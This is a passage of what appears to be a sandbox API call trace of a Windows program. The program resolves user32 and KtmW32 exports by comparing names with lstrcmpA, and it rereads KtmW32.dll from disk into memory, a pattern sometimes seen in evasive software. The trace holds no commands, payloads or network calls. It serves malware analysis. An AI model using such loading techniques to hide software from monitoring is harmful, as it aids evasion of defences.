(lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0228.349] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0228.350] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0228.350] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0228.350] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0228.350] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0228.350] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0228.351] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0228.351] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0228.351] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0228.351] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0228.351] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0228.351] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0228.351] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0228.351] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0228.351] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0228.351] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0228.352] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0228.352] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0228.352] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0228.352] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0228.352] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0228.352] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0228.352] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0228.352] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0228.352] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0228.352] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0228.352] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0228.352] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0228.352] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0228.353] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0228.353] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0228.353] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0228.353] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0228.353] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0228.353] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0228.353] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0228.353] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0228.353] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0228.353] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0228.353] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0228.353] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0228.353] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0228.353] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0228.353] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0228.354] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0228.354] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0228.354] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0228.354] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0228.354] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0228.354] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0228.354] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0228.354] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0228.354] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0228.354] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0228.354] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0228.354] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0228.354] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0228.354] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0228.354] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0228.355] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0228.355] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0228.355] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0228.355] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0228.355] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0228.355] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0228.355] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0228.355] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0228.355] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0228.355] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0228.355] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0228.355] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0228.355] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0228.355] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0228.355] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0228.355] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0228.355] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0228.355] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0228.356] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0228.356] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0228.356] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0228.356] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0228.356] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0228.356] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0228.356] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0228.356] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0228.356] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0228.356] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0228.356] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0228.356] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0228.356] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0228.356] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0228.356] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0228.356] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0228.357] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0228.357] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0228.357] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0228.357] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0228.357] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0228.357] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0228.357] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0228.357] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0228.357] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0228.357] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0228.471] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0228.471] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0228.471] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0228.471] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0228.471] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0228.472] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0228.473] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0228.473] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0228.473] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0228.473] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0228.473] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0228.473] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0228.473] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0228.473] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0228.473] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0228.473] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0228.473] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0228.474] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0228.474] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0228.474] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0228.474] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0228.474] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0228.474] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0228.474] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0228.474] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0228.474] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0228.474] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0228.474] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0228.474] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0228.474] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0228.475] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0228.475] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0228.475] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0228.475] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0228.475] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0228.475] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0228.475] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0228.475] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0228.475] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0228.475] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0228.475] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0228.475] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0228.475] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0228.475] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0228.476] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0228.476] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0228.476] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0228.476] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0228.476] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0228.476] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0228.476] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0228.476] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0228.476] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0228.817] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0228.818] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0228.818] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0228.818] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0228.818] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0228.818] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0229.431] GetProcessHeap () returned 0x570000 [0229.431] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4108040 | out: hHeap=0x570000) returned 1 [0229.441] GetProcessHeap () returned 0x570000 [0229.441] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589180 [0229.441] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0229.445] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0229.445] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0229.445] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0229.445] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0229.445] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0229.446] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0229.446] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0229.446] GetProcessHeap () returned 0x570000 [0229.446] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5e00) returned 0x2d45030 [0229.446] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0229.446] ReadFile (in: hFile=0x17c, lpBuffer=0x2d45030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d45030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0229.447] CloseHandle (hObject=0x17c) returned 1 [0229.447] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0229.447] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0229.447] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0229.447] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0229.447] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0229.447] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0229.447] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0229.447] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0229.447] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0229.447] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0229.447] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0229.447] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0229.447] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0229.447] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0229.447] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0229.448] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0229.448] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0229.448] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0229.448] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0229.448] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0229.448] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0229.448] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0229.448] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0229.448] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0229.448] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0229.448] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0229.448] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0229.448] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0229.448] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0229.448] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0229.448] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0229.448] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0229.448] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0229.448] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0229.448] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0229.448] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0229.448] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0229.448] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0229.448] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0229.448] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0229.448] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0229.449] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0229.449] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0229.449] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0229.449] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0229.449] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0229.449] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0229.449] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0229.449] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0229.449] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0229.449] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0229.449] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManager", 